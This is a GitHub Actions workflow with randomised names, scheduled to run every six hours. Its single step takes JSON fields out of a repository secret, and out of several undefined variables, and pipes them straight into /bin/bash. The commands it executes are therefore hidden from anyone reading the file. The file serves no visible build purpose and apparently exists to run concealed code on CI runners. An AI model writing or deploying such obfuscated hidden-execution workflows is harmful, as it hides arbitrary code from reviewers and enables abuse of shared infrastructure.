name: taogongzhu4536
on:
  workflow_dispatch:
  schedule:
    - cron: '50 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taogongzhu4536
        env:
          hhhtg5: ${{ secrets.hhhtg5 }}
        run: |
          echo $hhhtg5 | jq -r .f6 | /bin/bash
          echo $dbobz39 | jq -r .wlwxb04658 | /bin/bash
          echo $ssyqe36 | jq -r .bs2 | /bin/bash
          echo $k8 | jq -r .rpo31 | /bin/bash
          echo $zxirv96 | jq -r .fftwo60 | /bin/bash
          echo $bn59204 | jq -r .ptohh7 | /bin/bash
          echo $fck8299 | jq -r .ste7 | /bin/bash
          echo $lllu2 | jq -r .wq7 | /bin/bash
          echo $crr100 | jq -r .of51459 | /bin/bash
          echo $d4 | jq -r .hvjc13 | /bin/bash

